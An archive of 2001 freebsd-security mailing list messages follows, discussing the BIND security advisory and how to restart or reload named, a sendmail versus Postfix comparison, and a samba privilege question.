killall -HUP named is fine. "ndc restart" is when it restarts as root, not as -u bind. It would be nice to have ndc "know" about named_flags.
Brian

From owner-freebsd-security Wed Jan 31 20:56: 7 2001
From: Thomas Cannon
To: Marc Rassbach
Cc: Chris Johnson, Matt Dillon, Przemyslaw Frasunek, freebsd-security@FreeBSD.ORG
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind
Date: Wed, 31 Jan 2001 20:49:02 -0800 (PST)

> implied. I've a feeling the ISC isn't sending anyone a check for the bind
> exploit just posted to bugtraq from nobody@replay.com, or to NAI

Funny, I just took a look at that bind exploit that was posted -- it has that "oh so very much a trojan" look to it. I think it's a DoS for NAI. Ouch.

-t

From owner-freebsd-security Wed Jan 31 21:56:36 2001
Date: Wed, 31 Jan 2001 23:56:13 -0600
From: Christopher Farley
To: Fenix
Cc: freebsd-security@freebsd.org, freebsd-questions@freebsd.org
Subject: Re: sendmail vs.
 postfix question
Message-ID: <20010131235613.A7019@northernbrewer.com>
Mail-Followup-To: Christopher Farley, Fenix, freebsd-security@freebsd.org, freebsd-questions@freebsd.org
References: <01020104192002.01203@xs4some.net>
In-Reply-To: <01020104192002.01203@xs4some.net>; from fenix@xs4some.net on Thu, Feb 01, 2001 at 04:19:20AM +0100
Organization: Northern Brewer, St. Paul, MN

Fenix (fenix@xs4some.net) wrote:

> I have a little question about sendmail vs. postfix ....
> Are there any known recent problems with sendmail security?
> what about postfix?

Sendmail is a large, monolithic, complicated program that runs as root. Historically, it has been responsible for some of the most notorious and widespread security holes on the Internet, but I don't believe there are any (known) gaping holes in it today. Sendmail configuration is complicated and arcane -- it is the subject of one of the thickest books in the O'Reilly catalog. Actually, configuring sendmail is not that bad once you understand it -- you edit a human-readable config file which is processed by the m4 macro processor to build the much less human-readable sendmail.cf file. However, if you are like I am, and infrequently make configuration changes to your mail server, it may take more than a few minutes of grepping documentation to make even a tiny change.

Postfix has a different architecture, but strictly conforms to the 'sendmail api'. That is to say that Postfix is more or less designed to be a drop-in replacement for Sendmail. Postfix is actually several small, specialized daemons that do not run as root (!), which has some positive security implications. Configuration of Postfix is very easy; there is no m4 macro processing here!
I have always been able to make it do what I need it to do, although my needs aren't very great. According to my ISP (visi.com), Postfix outperforms Sendmail.

--
Christopher Farley
www.northernbrewer.com

From owner-freebsd-security Wed Jan 31 22:16:16 2001
Message-ID: <001701c08c16$5e989140$0101a8c0@pavilion>
From: "Richard Ward"
To: "Christopher Farley", "Fenix"
References: <01020104192002.01203@xs4some.net> <20010131235613.A7019@northernbrewer.com>
Subject: Re: sendmail vs. postfix question
Date: Thu, 1 Feb 2001 01:15:22 -0500
X-Mailer: Microsoft Outlook Express 5.00.2014.211

That's very true. One of the features that stand out in the "Sendmail versus Postfix" war is that Postfix doesn't "need" root. With some modification, neither does Sendmail. Though many won't take the time to do this, it's one of the reasons Sendmail is deemed one of the most insecure "common" daemons. I prefer Sendmail over Postfix simply because I was brought up on to the Internet running Sendmail; it feels more like home.
I do however have Postfix running on my local machine, and with keeping up-to-date on mailing lists such as this, none are a huge threat to my network.

I would have to agree, doing anything in Sendmail takes some reading, though for the basic e-mail setup, there's little need to bring out O'Reilly. Both Sendmail and Postfix have a home on my network; I suppose it's just how much time you want to put in to it that depicts which MTA you will be running on your next computer.

Just my two cents.

--
Richard Ward, CEO
richard@neonsky.net
Neonsky Internet Services
877 249 6707 - US/Canada

From owner-freebsd-security Wed Jan 31 23:31:34 2001
Date: Wed, 31 Jan 2001 23:30:28 -0800
From: "Crist J. Clark"
To: Matt Dillon
Cc: Alfred Perlstein, Brian Behlendorf, Roman Shterenzon, freebsd-security@FreeBSD.ORG
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind
Message-ID: <20010131233028.S91447@rfx-216-196-73-168.users.reflex>
Reply-To: cjclark@alum.mit.edu
References: <20010131140447.E26076@fw.wintelcom.net> <20010131145423.H26076@fw.wintelcom.net> <200101312305.f0VN5vJ19469@earth.backplane.com> <20010131151531.I26076@fw.wintelcom.net> <200101312327.f0VNRPv20077@earth.backplane.com>
In-Reply-To: <200101312327.f0VNRPv20077@earth.backplane.com>; from dillon@earth.backplane.com on Wed, Jan 31, 2001 at 03:27:25PM -0800

On Wed, Jan 31, 2001 at 03:27:25PM -0800, Matt Dillon wrote:
> :> I think we can easily make it the default.
> :
> :If it breaks HUP, then not really. :)
> :
> :I'm not sure how bind handles restarts, but even if it exec(2)s over
> :itself it can track the fd open for its socket and shouldn't have to
> :rebind it.
>
>     You gotta work with what you have. Bind outsmarts itself in a lot
>     of places, especially the stupid interface scanning/binding code. The
>     last thing I want it to do is hold *any* state from the previous
>     incarnation across a restart. Frankly, restarting is not a big deal
>     even if you have hundreds or thousands of domains. I always restarted
>     named at BEST rather than HUP it, because HUPing is simply too
>     dangerous when you make random modifications to dozens of primary
>     zone files out of thousands.

You also lose the cache. Some people may not like that.
--
Crist J. Clark cjclark@alum.mit.edu

From owner-freebsd-security Wed Jan 31 23:59: 9 2001
Date: Wed, 31 Jan 2001 23:58:48 -0800 (PST)
From: Matt Dillon
Message-Id: <200102010758.f117wlJ26496@earth.backplane.com>
To: "Crist J. Clark"
Cc: Alfred Perlstein, Brian Behlendorf, Roman Shterenzon, freebsd-security@FreeBSD.ORG
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind
References: <20010131140447.E26076@fw.wintelcom.net> <20010131145423.H26076@fw.wintelcom.net> <200101312305.f0VN5vJ19469@earth.backplane.com> <20010131151531.I26076@fw.wintelcom.net> <200101312327.f0VNRPv20077@earth.backplane.com> <20010131233028.S91447@rfx-216-196-73-168.users.reflex>

:
:On Wed, Jan 31, 2001 at 03:27:25PM -0800, Matt Dillon wrote:
:> :> I think we can easily make it the default.
:> :
:> :If it breaks HUP, then not really. :)
:> :
:> :I'm not sure how bind handles restarts, but even if it exec(2)s over
:> :itself it can track the fd open for its socket and shouldn't have to
:> :rebind it.
:>
:>     You gotta work with what you have. Bind outsmarts itself in a lot
:>     of places, especially the stupid interface scanning/binding code. The
:>     last thing I want it to do is hold *any* state from the previous
:>     incarnation across a restart. Frankly, restarting is not a big deal
:>     even if you have hundreds or thousands of domains.
:>     I always restarted
:>     named at BEST rather than HUP it, because HUPing is simply too
:>     dangerous when you make random modifications to dozens of primary
:>     zone files out of thousands.
:
:You also lose the cache. Some people may not like that.
:--
:Crist J. Clark cjclark@alum.mit.edu

Recursive nameservers generally do not need to be HUPd or restarted. It's the nameservers handing out primary and secondary zones that usually need HUPing/restarting. Nobody in their right mind runs a primary/secondary zone server with any significant number of domains or load in recursive mode. Even the smallest ISP with any brains separates the functions out. Anyone who does -- well, they get what they deserve, and I guarantee you that the fact their cache may have to be reloaded is inconsequential relative to all the other fallout.

The plain fact of the matter is that if you want reliable name service, you can't afford even to HUP the recursive nameservers (which take the brunt of your other hosts' lookup load and for which there is no easy way to create redundancy in a manner that appears seamless to hosts using said server as a resolver). Even HUPing can result in a few seconds' worth of glitches, which in turn can glitch every single host trying to use that server for lookups.

This is why you separate functions... DNS servers handing out primary and secondary zones can afford to go offline for minutes, even hours, without glitching anyone, as long as there is at least one other NS for the zone(s). Servers handling recursive lookups for hosts can't afford to go offline for even an instant, because the hosts using those servers often take several seconds ON EACH LOOKUP to fall back to a secondary recursive server. If you think specifying multiple recursive servers in /etc/resolv.conf will save a heavily loaded host, like a mail box, you will be in for one hellofa surprise when your primary resolver goes down!
Since you typically never have to reload or restart a recursive nameserver that is not primary or secondary for any zones, and since you typically always have to reload or restart a primary zone server (whenever you make a change to a zone)... Well, it should be obvious.

-Matt

From owner-freebsd-security Thu Feb 1 2: 2:54 2001
Date: Thu, 1 Feb 2001 12:02:19 +0200
From: Neil Blakey-Milner
To: Matt Dillon
Cc: Chris Johnson, Przemyslaw Frasunek, freebsd-security@FreeBSD.ORG
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind
Message-ID: <20010201120218.A10087@rapier.smartspace.co.za>
References: <200101312123.f0VLNL134920@freefall.freebsd.org> <20010201014819.H675@riget.scene.pl> <20010131200142.A90211@palomine.net> <200102010154.f111sYE23275@earth.backplane.com>
In-Reply-To: <200102010154.f111sYE23275@earth.backplane.com>; from dillon@earth.backplane.com on Wed, Jan 31, 2001 at 05:54:34PM -0800
Organization: Building Intelligence
X-Operating-System: FreeBSD 4.2-RELEASE i386
X-URL: http://rucus.ru.ac.za/~nbm/

On Wed 2001-01-31 (17:54), Matt Dillon wrote:
>
> :Yes! Why work around BIND limitations and do all this sandboxing to try to
> :limit the damage it can do to you, when there's a better alternative?
> :
> :Chris
>
>     Yah, that's the ticket...
>     kinda like wu-ftpd was created because existing
>     ftpd's weren't up to snuff, except wu-ftpd turned out to have literally
>     dozens of rootable exploits.
>
>     Just because BIND's loopholes are advertised doesn't mean that other
>     DNS servers don't have loopholes. While I agree that some of the newer
>     ones almost certainly have *fewer* rootable loopholes, maybe, I don't
>     see them as improving my risk factors much.

It might be an idea to actually research djbdns, consider its design, history, and coding standards, and then make a judgement.

Neil (aka djbdns port maintainer (with lots of help from roam))
--
Neil Blakey-Milner
nbm@mithrandr.moria.org

From owner-freebsd-security Thu Feb 1 2:22:49 2001
X-URL: http://www.ofug.org/~des/
X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated.
From: Dag-Erling Smorgrav
To: Alfred Perlstein
Cc: Brian Behlendorf, Roman Shterenzon, freebsd-security@FreeBSD.ORG
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind
Date: 01 Feb 2001 11:22:26 +0100
References: <20010131140447.E26076@fw.wintelcom.net> <20010131145423.H26076@fw.wintelcom.net>
In-Reply-To: Alfred Perlstein's message of "Wed, 31 Jan 2001 14:54:23 -0800"
User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4

Alfred Perlstein writes:
> What I'm worrying about specifically is ndc and other utilities
> basically are unix domain sockets not in the expected place all of
> sudden?

Does anybody read this list, or do you all just post to it without reading anything anyone else is posting?

I posted detailed instructions for a) upgrading a vulnerable system without making world, and b) setting up BIND in chroot and jail sandboxes, including how to deal with ndc and log sockets, just a few days ago.

DES
--
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Thu Feb 1 3:32:39 2001
From: Dragos Ruiu
Organization: kyx.net
To: Christopher Farley, Fenix
Subject: Re: sendmail vs.
 postfix question
Date: Thu, 1 Feb 2001 03:22:20 -0800
X-Mailer: KYX-CP/M [version core00-mail-92]
Cc: freebsd-security@freebsd.org, freebsd-questions@freebsd.org
References: <01020104192002.01203@xs4some.net> <20010131235613.A7019@northernbrewer.com>
In-Reply-To: <20010131235613.A7019@northernbrewer.com>
Message-Id: <01020103331409.27656@smp.kyx.net>

On Wed, 31 Jan 2001, Christopher Farley wrote:
> Fenix (fenix@xs4some.net) wrote:
>
> > I have a little question about sendmail vs. postfix ....
> > Are there any known recent problems with sendmail security?
> > what about postfix?
>
> Sendmail is a large, monolithic, complicated program that runs as
> root. Historically, it has been responsible for some of the most
> notorious and widespread security holes on the Internet, but I
> don't believe there are any (known) gaping holes in it today.
> Sendmail configuration is complicated and arcane -- it is the
> subject of one of the thickest books in the O'Reilly catalog.
> Actually, configuring sendmail is not that bad once you understand
> it -- you edit a human-readable config file which is processed by
> the m4 macro processor to build the much less human-readable
> sendmail.cf file. However, if you are like I am, and infrequently
> make configuration changes to your mail server, it may take more than a
> few minutes of grepping documentation to make even a tiny change.
>
> Postfix has a different architecture, but strictly conforms to the
> 'sendmail api'. That is to say that Postfix is more or less designed
> to be a drop-in replacement for Sendmail. Postfix is actually
> several small, specialized daemons that do not run as root (!),
> which has some positive security implications. Configuration of
> Postfix is very easy; there is no m4 macro processing here!
> I have
> always been able to make it do what I need it to do, although my
> needs aren't very great. According to my ISP (visi.com), Postfix
> outperforms Sendmail.
>

Postfix performance exceeds sendmail performance on equivalent boxes in all my experiences in terms of just about any metric you care to use, and I use it exclusively these days. As anecdotal evidence, once when I configured it on a very fast machine and sent a lot of mail through it, I had a large ISP call up and complain that I was DoSing their mail server.... It was just postfix being its normal, speedy, efficient self, and they had some NT lameware mail relay....

As far as security, given how much I rely on it, I recently (last year) decided to re-audit its code, and after a couple of days spent looking for format strings and other stuff I decided to discontinue the audit... Mr. Venema's code is so rigorous that it even passes _internal_ data between routines through filtering and cleaning functions (how paranoid is that :-) if that's any indication of how it's built up. I personally think very highly of it.

(Besides, I really would be fine if I never have to look at another arcane sendmail ruleset ever again... :-P )

cheers,
--dr

--
Dragos Ruiu dursec.com ltd. / kyx.net - we're from the future
gpg/pgp key on file at wwwkeys.pgp.net or at http://dursec.com/drkey.asc
http://cansecwest.com CanSecWest/core01: March 28-30, Vancouver B.C.
------------^
Speakers: Renaud Deraison/Nessus Attack Scanner, Martin Roesch/Snort/Advanced IDS, Ron Gula/Enterasys/Strategic IDS, Dug Song/Arbor Networks/Monkey in the Middle, RFP/Whisker2.0 and other fun, Mixter/2XS/Distributed Apps, Theo DeRaadt/OpenBSD, K2/w00w00/ADMutate, HD Moore/Digital Defense/Making NT Bleed, Frank Heidt/@Stake, Matthew Franz/Cisco/Trinux/Security Models, Fyodor/insecure.org/Packet Reconnaissance, Lance Spitzner/Sun/Honeynet Fun, Robert Graham/NetworkICE/IDS Technology Demo, Kurt Seifried/SecurityPortal/Crypto: 2-Edged Sword, Dave Dittrich/UW/Forensics, Sebastien Lacoste-Seris & Nicolas Fischbach/COLT Telecom/Securite.Org/Kerberized SSH Deployment, Jay Beale/MandrakeSoft/Bastille-Linux/Securing Linux

From owner-freebsd-security Thu Feb 1 6:45:39 2001
Date: Thu, 1 Feb 2001 08:45:17 -0600
From: "Paul T. Root"
To: security@freebsd.org
Subject: Re: sendmail vs. postfix question
Message-ID: <20010201084517.A11129@horton.iaces.com>
X-Organization: Qwest - ACES
X-Address: Minneapolis, MN 55413

I took the advanced Sendmail course from Allman back at the '99 LISA.
At that time he said there had been no security holes found in sendmail in a few years (I don't remember the actual number), and in those 2 years, I don't remember any.

I also run Sendmail Switch (the for-sale version) on my main domain, and it installs running without root.

> Date: Thu, 1 Feb 2001 01:15:22 -0500
> From: "Richard Ward"
> Subject: Re: sendmail vs. postfix question
>
> That's very true. One of the features that stand out in the "Sendmail
> versus Postfix" war is that Postfix doesn't "need" root. With some
> modification, neither does Sendmail. Though many won't take the time to
> do this, it's one of the reasons Sendmail is deemed one of the most
> insecure "common" daemons. I prefer Sendmail over Postfix simply because
> I was brought up on to the Internet running Sendmail, it feels more like
> home. I do however have Postfix running on my local machine, and with
> keeping up-to-date on mailing lists such as this, none are a huge threat
> to my network.
>
> I would have to agree, doing anything in Sendmail takes some reading,
> though for the basic e-mail setup, there's little need to bring out
> O'Reilly. Both Sendmail and Postfix have a home on my network, I suppose
> it's just how much time you want to put in to it that depicts which MTA
> you will be running on your next computer.
>
> Just my two cents.
> --
> Richard Ward, CEO
> richard@neonsky.net
> Neonsky Internet Services
> 877 249 6707 - US/Canada

--
Shaquille O'Neal, on his lack of championships: "I've won at every level, except college and pro."
From owner-freebsd-security Thu Feb 1 6:46:23 2001
Date: Thu, 1 Feb 2001 09:46:49 -0500 (EST)
From: Rob Simmons
To: security@freebsd.org
Subject: samba

I just noticed that each of the smbd processes on my samba/freebsd 4.2-stable box are running as root. On an older debian machine, each of the smbd processes ran as the user that was connected. Is this a difference due to something in freebsd? Or is it a difference between version 2.0.6 and 2.0.7 of samba?
Robert Simmons Systems Administrator http://www.wlcg.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 7: 6:47 2001 Delivered-To: freebsd-security@freebsd.org Received: from inetworx.pcgameauthority.com (154.160.20.216.fastpoint.net [216.20.160.154]) by hub.freebsd.org (Postfix) with ESMTP id 3BAB337B491; Thu, 1 Feb 2001 07:06:22 -0800 (PST) Received: from maximus (maximus.pcgameauthority.com [192.168.10.4]) by inetworx.pcgameauthority.com (Postfix) with SMTP id 23CD49501; Thu, 1 Feb 2001 07:07:59 -0800 (PST) Message-ID: <001c01c08c60$a49ee640$040aa8c0@pcgameauthority.com> Reply-To: "Andre Hall" From: "Andre Hall" To: "Dragos Ruiu" , "Christopher Farley" , "Fenix" Cc: , References: <01020104192002.01203@xs4some.net> <20010131235613.A7019@northernbrewer.com> <01020103331409.27656@smp.kyx.net> Subject: Re: sendmail vs. postfix question Date: Thu, 1 Feb 2001 07:07:07 -0800 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I once was faced with the same dilemma as you were. I finally decided to go the Postfix way and have not regretted my decision one bit. It was the easiest and fastest configuration I had experienced, a definite plus over Sendmail. From my first experience with Sendmail I have always been displeased with how archaic it is, especially if you need to make changes. Postfix's configuration file is very user-friendly; you don't have to be a rocket scientist to make changes. Straight and to the point. You can also find an abundance of support on the author's site. It's really based on personal preference. 
I hope my two cents helps you ----- Original Message ----- From: "Dragos Ruiu" To: "Christopher Farley" ; "Fenix" Cc: ; Sent: Thursday, February 01, 2001 3:22 AM Subject: Re: sendmail vs. postfix question > On Wed, 31 Jan 2001, Christopher Farley wrote: > > Fenix (fenix@xs4some.net) wrote: > > > > > I have a little question about sendmail vs. postfix .... > > > Are there any known recent problms with sendmail security ? > > > what about postfix ? > > > > Sendmail is a large, monolithic, complicated program that runs as > > root. Historically, it has been responsible for some of the most > > notorious and widespread security holes on the Internet, but I > > don't believe there are any (known) gaping holes in it today. > > Sendmail configuration is complicated and arcane -- it is the > > subject of one of the thickest books in the O'Reilly catalog. > > Actually, configuring sendmail is not that bad once you understand > > it -- you edit a human-readable config file which is processed by > > the m4 macro processor to build the much less human-readable > > sendmail.cf file. However, if you are like I am, and infrequently > > make configuration changes to your mail server, it may take more than a > > few minutes of grepping documentation to make even a tiny change. > > > > Postfix has a different architecture, but strictly conforms to the > > 'sendmail api'. That is to say that Postfix is more or less designed > > to be a drop-in replacement for Sendmail. Postfix is actually > > several small, specialized daemons that do not run as root (!), > > which has some positive security implications. Configuration of > > Postfix is very easy; there is no m4 macro processing here! I have > > always been able to make it do what I need it to do, although my > > needs aren't very great. According to my ISP (visi.com), Postfix > > outperforms Sendmail. 
> > > > Postfix performance exceeds sendmail performance on equivalent boxes in all my > experiences in terms of just about any metric you care to use, and I use it > exclusively these days. As anecdotal evidence, once when I configured it on a > very fast machine and sent a lot of mail through it, I had a large ISP call up > and complain that I was DoSing their mail server.... It was just postfix being > its normal, speedy, efficient self, and they had some NT lameware mail relay.... > > As far as security, given how much I rely on it, I recently(last year) decided > to re-audit its code, and after a couple of days spent looking for format > strings and other stuff I decided to discontinue the audit... Mr. Venema's code > is so rigorous that it even passes _internal_ data between routines through > filtering and cleaning functions (how paranoid is that :-) if that's any > indication of how it's built up. > > I personally think very highly of it. (Besides, I really would be fine > if I never have to look at another arcane sendmail ruleset ever > again... :-P ) > > cheers, > --dr > > -- > Dragos Ruiu dursec.com ltd. / kyx.net - we're from the future > gpg/pgp key on file at wwwkeys.pgp.net or at http://dursec.com/drkey.asc > http://cansecwest.com > CanSecWest/core01: March 28-30, Vancouver B.C. 
------------^ > Speakers: Renaud Deraison/Nessus Attack Scanner, Martin Roesch/Snort/Advanced IDS, > Ron Gula/Enterasys/Strategic IDS, Dug Song/Arbor Networks/Monkey in the Middle, > RFP/Whisker2.0 and other fun, Mixter/2XS/Distributed Apps, Theo DeRaadt/OpenBSD, > K2/w00w00/ADMutate, HD Moore/Digital Defense/Making NT Bleed, Frank Heidt/@Stake, > Matthew Franz/Cisco/Trinux/Security Models, Fyodor/insecure.org/Packet Reconaissance, > Lance Spitzner/Sun/Honeynet Fun, Robert Graham/NetworkICE/IDS Technology Demo, > Kurt Seifried/SecurityPortal/Crypto: 2-Edged Sword, Dave Dittrich/UW/Forensics, > Sebastien Lacoste-Seris & Nicolas Fischbach/COLT Telecom/Securite.Org/Kerberized > SSH Deployment, Jay Beale/MandrakeSoft/Bastille-Linux/Securing Linux > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 7: 9:43 2001 Delivered-To: freebsd-security@freebsd.org Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (Postfix) with SMTP id 3584C37B491 for ; Thu, 1 Feb 2001 07:09:23 -0800 (PST) Received: (qmail 38344 invoked by uid 1001); 1 Feb 2001 15:09:21 +0000 (GMT) To: dillon@earth.backplane.com Cc: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind From: sthaug@nethelp.no In-Reply-To: Your message of "Wed, 31 Jan 2001 17:50:48 -0800 (PST)" References: <200102010150.f111omZ23184@earth.backplane.com> X-Mailer: Mew version 1.05+ on Emacs 19.34.2 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Thu, 01 Feb 2001 16:09:21 +0100 Message-ID: <38342.981040161@verdi.nethelp.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Umm... respectfully, you are not configuring your system correctly > if the down time affects you. 
> > This is what we did at BEST: ... > * Three machines running named, non-recursive, ONLY used to serve > primary and secondary zones. At least 20,000 zones, dup'd to each > box. > > We updated the primary DNS boxes four times a day. We updated the boxes > one at a time, so at any given moment only one was 'down'. > > The DNS protocols handle the rest. It's perfectly acceptable for a > primary NS to be down as long as other primary NS's are up. And that's where we like to keep the servers running - even if they are running non-recursive, and (of course!) there are several servers for each zone. Thus we prefer ndc reconfig/reload (and HUP before that was available). Steinar Haug, Nethelp consulting, sthaug@nethelp.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 7:12:36 2001 Delivered-To: freebsd-security@freebsd.org Received: from post.mail.nl.demon.net (post-10.mail.nl.demon.net [194.159.73.20]) by hub.freebsd.org (Postfix) with ESMTP id 9BEFE37B491; Thu, 1 Feb 2001 07:12:08 -0800 (PST) Received: from [195.11.243.26] (helo=Debug) by post.mail.nl.demon.net with smtp (Exim 3.14 #2) id 14OLP2-0005FC-00; Thu, 01 Feb 2001 15:12:04 +0000 To: "Andre Hall" , "Dragos Ruiu" , "Christopher Farley" , "Fenix" , , From: Cliff Sarginson Subject: Re: sendmail vs. postfix question Date: Thu, 1 Feb 2001 15:12:04 GMT X-Mailer: www.webmail.nl.demon.net X-Sender: postmaster@btvs.demon.nl X-Originating-IP: 192.250.25.251 Message-Id: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I want to endorse the comments below. The author of Postfix has produced a really solid, fast and secure mail system. You may be interested to know he also authored tcp-wrappers and the (in)famous satan program. He also personally answers many of the questions on the postfix-users@postfix.org mailing list. Browse the archives on deja if you are curious. 
Cliff > I once was faced with the same dilemma as you were. I finally decide to the > Postfix way have not regretted my decision one bit. It was the easiest and > fastest configuration I had experienced, a definite plus over Sendmail. From > my first experience with Sendmail I always been displeased with how arcaic > it is, especially if you need to make changes. Postfix's configuration file > is very user-friendly- you don't have to be a rocket scientist to make > changes. Straight and to the point. You can also find an abundance of > support on the author's site. It's really based on personal preference. > I hope my two cents helps you > > ----- Original Message ----- > From: "Dragos Ruiu" > To: "Christopher Farley" ; "Fenix" > > Cc: ; > Sent: Thursday, February 01, 2001 3:22 AM > Subject: Re: sendmail vs. postfix question > > > > On Wed, 31 Jan 2001, Christopher Farley wrote: > > > Fenix (fenix@xs4some.net) wrote: > > > > > > > I have a little question about sendmail vs. postfix .... > > > > Are there any known recent problms with sendmail security ? > > > > what about postfix ? > > > > > > Sendmail is a large, monolithic, complicated program that runs as > > > root. Historically, it has been responsible for some of the most > > > notorious and widespread security holes on the Internet, but I > > > don't believe there are any (known) gaping holes in it today. > > > Sendmail configuration is complicated and arcane -- it is the > > > subject of one of the thickest books in the O'Reilly catalog. > > > Actually, configuring sendmail is not that bad once you understand > > > it -- you edit a human-readable config file which is processed by > > > the m4 macro processor to build the much less human-readable > > > sendmail.cf file. However, if you are like I am, and infrequently > > > make configuration changes to your mail server, it may take more than a > > > few minutes of grepping documentation to make even a tiny change. 
> > > > > > Postfix has a different architecture, but strictly conforms to the > > > 'sendmail api'. That is to say that Postfix is more or less designed > > > to be a drop-in replacement for Sendmail. Postfix is actually > > > several small, specialized daemons that do not run as root (!), > > > which has some positive security implications. Configuration of > > > Postfix is very easy; there is no m4 macro processing here! I have > > > always been able to make it do what I need it to do, although my > > > needs aren't very great. According to my ISP (visi.com), Postfix > > > outperforms Sendmail. > > > > > > > Postfix performance exceeds sendmail performance on equivalent boxes in > all my > > experiences in terms of just about any metric you care to use, and I use > it > > exclusively these days. As anecdotal evidence, once when I configured it > on a > > very fast machine and sent a lot of mail through it, I had a large ISP > call up > > and complain that I was DoSing their mail server.... It was just postfix > being > > its normal, speedy, efficient self, and they had some NT lameware mail > relay.... > > > > As far as security, given how much I rely on it, I recently(last year) > decided > > to re-audit its code, and after a couple of days spent looking for format > > strings and other stuff I decided to discontinue the audit... Mr. Venema's > code > > is so rigorous that it even passes _internal_ data between routines > through > > filtering and cleaning functions (how paranoid is that :-) if that's any > > indication of how it's built up. > > > > I personally think very highly of it. (Besides, I really would be fine > > if I never have to look at another arcane sendmail ruleset ever > > again... :-P ) > > > > cheers, > > --dr > > > > -- > > Dragos Ruiu dursec.com ltd. / kyx.net - we're from the > future > > gpg/pgp key on file at wwwkeys.pgp.net or at http://dursec.com/drkey.asc > > > http://cansecwest.com > > CanSecWest/core01: March 28-30, Vancouver B.C. 
------------^ > > Speakers: Renaud Deraison/Nessus Attack Scanner, Martin > Roesch/Snort/Advanced IDS, > > Ron Gula/Enterasys/Strategic IDS, Dug Song/Arbor Networks/Monkey in the > Middle, > > RFP/Whisker2.0 and other fun, Mixter/2XS/Distributed Apps, Theo > DeRaadt/OpenBSD, > > K2/w00w00/ADMutate, HD Moore/Digital Defense/Making NT Bleed, Frank > Heidt/@Stake, > > Matthew Franz/Cisco/Trinux/Security Models, Fyodor/insecure.org/Packet > Reconaissance, > > Lance Spitzner/Sun/Honeynet Fun, Robert Graham/NetworkICE/IDS Technology > Demo, > > Kurt Seifried/SecurityPortal/Crypto: 2-Edged Sword, Dave > Dittrich/UW/Forensics, > > Sebastien Lacoste-Seris & Nicolas Fischbach/COLT > Telecom/Securite.Org/Kerberized > > SSH Deployment, Jay Beale/MandrakeSoft/Bastille-Linux/Securing Linux > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 7:33:56 2001 Delivered-To: freebsd-security@freebsd.org Received: from test.kens.com (kens.com [129.250.30.40]) by hub.freebsd.org (Postfix) with ESMTP id 6A78337B684 for ; Thu, 1 Feb 2001 07:33:31 -0800 (PST) Received: (qmail 4067 invoked by uid 1002); 1 Feb 2001 15:33:31 -0000 Date: Thu, 1 Feb 2001 10:33:31 -0500 From: "Robin S. Socha" To: freebsd-security@FreeBSD.ORG, freebsd-questions@FreeBSD.ORG Subject: Re: sendmail vs. 
postfix question Message-ID: <20010201103331.L53804@kens.com> Reply-To: freebsd-questions@FreeBSD.ORG References: Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline User-Agent: Mutt/1.3.14i In-Reply-To: ; from cliff@raggedclown.net on Thu, Feb 01, 2001 at 03:12:04PM +0000 X-Mailer: Mutt http://www.mutt.org/ X-URL: https://socha.net/ X-Editor: Vim-600 http://www.vim.org/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Cliff Sarginson [010201 10:13]: >> I once was faced with the same dilemma as you were. I finally decide >> to the Postfix way have not regretted my decision one bit. It was >> the easiest and fastest configuration I had experienced, a definite >> plus over Sendmail. Null argument, since the same applies to every other MTA, particularly qmail. > I want to endorse the comments below. No. You want to endorse this and fix your quoting. And while we're at it, don't think for a minute about Cc:ing me: http://learn.to/edit_messages > The author of Postfix has produced a realy solid, fast and > secure mail system. You may be interested to know he also > authored tcp-wrappers and the (in)famous satan program. > He also personally answers many of the questions on the > postfix-users@postfix.org mailling list. Wietse Venema is also extremely nice and friendly. /Un/fortunately, that has not much to do with security ;-) Anyway, postfix and qmail are indeed the MTAs of choice if you're looking for secure and fast ones. If you intend to run mailing lists, qmail's ezmlm is, however, /the/ #1 choice. Reply-to set. 
